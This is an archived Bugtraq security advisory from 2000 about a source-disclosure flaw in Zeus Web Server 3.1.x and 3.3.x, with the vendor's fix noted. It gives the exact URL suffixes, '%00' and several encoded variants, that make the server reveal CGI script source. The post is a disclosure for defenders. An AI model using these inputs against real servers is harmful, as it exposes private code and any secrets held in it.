Bugtraq mailing list archives
[SAFER 000209.EXP.1.2] Zeus Web Server - obtaining source of CGI scripts
From: vanja () RELAYGROUP COM (Vanja Hrustic)
Date: Wed, 9 Feb 2000 01:56:03 +0700
__________________________________________________________ S.A.F.E.R. Security Bulletin 000209.EXP.1.2 __________________________________________________________ TITLE: Zeus Web Server - obtaining source of CGI scripts DATE: February 09, 2000 NATURE: Remote user can obtain access to sources of CGI scripts AFFECTED: Zeus Web Server 3.1.x and 3.3.x FIXES: Zeus Web Server 3.3.5a is not vulnerable DETAILS: Sources of CGI scripts (and other files) can be read by any user, if the '%00' string is appended to the name of the CGI script. Following strings can also be appended in order to reveal the source: %G0 %W0 %EW %FG %UW %VG PROBLEM: The Zeus Web server is vulnerable to a problem that allows remote users to see the source of CGI scripts. Any user can append '%00' to the name of the CGI script and view the source. Files in directories that are configured to contain executable scripts (/cgi-bin, for example) are not the subject to this problem. FIXES: Zeus Technology has responded immediately, and fixed the problem in matter of hours. It is really a pleasure to get such a quick response from the vendor. All kudos to them. The fixed version is available at: ftp://ftp.zeustechnology.com/pub/products/z3 All customers are advised to upgrade. __________________________________________________________ S.A.F.E.R. - Security Alert For Entreprise Resources Copyright (c) 2000 The Relay Group http://safer.siamrelay.com --- security () relaygroup com __________________________________________________________
Current thread:
- [SAFER 000209.EXP.1.2] Zeus Web Server - obtaining source of CGI scripts Vanja Hrustic (Feb 08)